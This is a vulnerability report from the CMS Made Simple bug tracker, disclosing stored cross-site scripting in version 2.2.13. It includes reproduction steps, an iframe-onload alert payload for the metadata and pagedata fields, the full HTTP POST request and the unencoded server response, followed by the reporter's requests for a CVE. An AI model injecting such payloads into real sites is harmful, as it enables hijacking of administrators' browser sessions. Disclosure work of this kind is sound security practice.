CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12226] Stored Cross-Site Scripting - CMS Made Simple 2.2.13

avatar
Created By: Guram Javakhishvili (guramjava)
Date Submitted: Sun Dec 22 17:54:12 -0500 2019

Assigned To: Robert Campbell (calguy1000)
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Critical
Resolution: None
State: Open
Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
CMS Made Simple 2.2.13 - Cross-Site Scripting (XSS) Persistent (2 Instances)

# Summary:

• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored (2 Instances)
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software : CMS Made Simple 2.2.13 
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Stored


# Description:

CMS Made Simple version 2.2.13  suffer from reflective and persistent (Stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross site
scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.
   When the content being viewed, e.g. by an administrative user, the
   JavaScript code will be executed in the browser. 

# Steps to Reproduce:

The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the add/edit content function was found to be vulnerable to a
Stored Cross Site Scripting (XSS) vulnerability.
Login as editor > click on 'Content' > click on 'Content Manager' > Add/Edit
Content> click on 'Logic' and insert XSS payloads into the Metadata and Smarty
fields and click submit.
- If you click on 'Preview' next tab, the XSS payload for Metadata will render
in the browser.
- Once submitted the content with XSS payload, now click on view (search
symbol) which will open new tab and the XSS payload for Smarty will render in
the new window tab.

When the content being viewed, e.g. by an administrative user, the JavaScript
code will be executed in the browser.

# URL:
http://localhost/cmsms-2.2.13/admin/moduleinterface.php


List of vulnerable parameters:
 .  metadata
 .  pagedata

XSS Vector:
"";"/><iframe/onload=alert('Metadata')>//



# HTTP POST request:

POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data;
boundary=---------------------------133703138732410
Content-Length: 4193
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D;
__c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1

-----------------------------133703138732410
Content-Disposition: form-data; name="mact"

CMSContentManager,m1_,admin_editcontent,0
-----------------------------133703138732410
Content-Disposition: form-data; name="__c"

233d48d93b73772c983
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_id"

5
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_active_tab"


-----------------------------133703138732410
Content-Disposition: form-data; name="m1_content_type"

content
-----------------------------133703138732410
Content-Disposition: form-data; name="title"

Content
-----------------------------133703138732410
Content-Disposition: form-data; name="content_en"

<p>test</p>
-----------------------------133703138732410
Content-Disposition: form-data; name="menutext"

Content
-----------------------------133703138732410
Content-Disposition: form-data; name="parent_id"

2
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="showinmenu"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="titleattribute"

test
-----------------------------133703138732410
Content-Disposition: form-data; name="accesskey"


-----------------------------133703138732410
Content-Disposition: form-data; name="tabindex"


-----------------------------133703138732410
Content-Disposition: form-data; name="target"

---
-----------------------------133703138732410
Content-Disposition: form-data; name="metadata"

"";"/><iframe/onload=alert('Metadata')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="pagedata"

"";"/><iframe/onload=alert('Smarty')>//
-----------------------------133703138732410
Content-Disposition: form-data; name="design_id"

5
-----------------------------133703138732410
Content-Disposition: form-data; name="template_id"

5
-----------------------------133703138732410
Content-Disposition: form-data; name="alias"

error404
-----------------------------133703138732410
Content-Disposition: form-data; name="active"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="active"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="secure"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="cachable"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="image"

\logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="thumbnail"

\thumb_logo1.gif
-----------------------------133703138732410
Content-Disposition: form-data; name="extra1"


-----------------------------133703138732410
Content-Disposition: form-data; name="extra2"


-----------------------------133703138732410
Content-Disposition: form-data; name="extra3"


-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="wantschildren"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="searchable"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="disable_wysiwyg"

0
-----------------------------133703138732410
Content-Disposition: form-data; name="ownerid"

1
-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors"


-----------------------------133703138732410
Content-Disposition: form-data; name="additional_editors[]"

2
-----------------------------133703138732410
Content-Disposition: form-data; name="m1_submit"

Submit
-----------------------------133703138732410--







# Snip of HTTP Server response (output not encoded):

HTTP/1.1 200 OK
Date: Sat, 21 Dec 2019 19:01:47 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1c PHP/7.3.7
X-Powered-By: PHP/7.3.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11148

"";"/><iframe/onload=alert('Smarty')>//<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


<head>
    <title>guram - Content</title>


 
<base href="http://localhost/cmsms-2.2.13/" />
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All
rights reserved." />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

"";"/><iframe/onload=alert('Metadata')>//


<link rel="stylesheet" type="text/css"
href="http://localhost/cmsms-2.2.13/tmp/cache/stylesheet_combined_fc62991346a03890a7c4a79a94d4e411.css"
media="screen" />


History

Comments
avatar
Date: 2020-03-01 05:47
Posted By: Guram Javakhishvili (guramjava)

Hi,

Is there any update on this?
      
avatar
Date: 2020-03-01 14:02
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
      
avatar
Date: 2020-03-08 15:17
Posted By: Guram Javakhishvili (guramjava)

Hi, Is there any update on the above and could you please assign CVE to this
vulnerability? Thanks.
      
avatar
Date: 2020-03-21 14:06
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
      
avatar
Date: 2020-05-03 16:00
Posted By: Guram Javakhishvili (guramjava)

Hello,

Is there any update on this? I have been asking for an update since my
submission of the above vulnerability. It is by now over five month since this
vulnerability has been reported to you by myself.
And I would like to ask you if you would let me go public by next week? 
Could you please mark this as PUBLIC?
I also wish to request a CVE number for this vulnerability if that is ok?

If you have any questions please let you know.

Regards,
Guram
      
Updates

Updated: 2020-03-08 15:17
assigned_to_id: 13536 => 106

Updated: 2019-12-22 17:56
summary: CMS Made Simple 2.2.13 - Stored Cross-Site Scripting => Stored Cross-Site Scripting - CMS Made Simple 2.2.13
resolution_id: => 5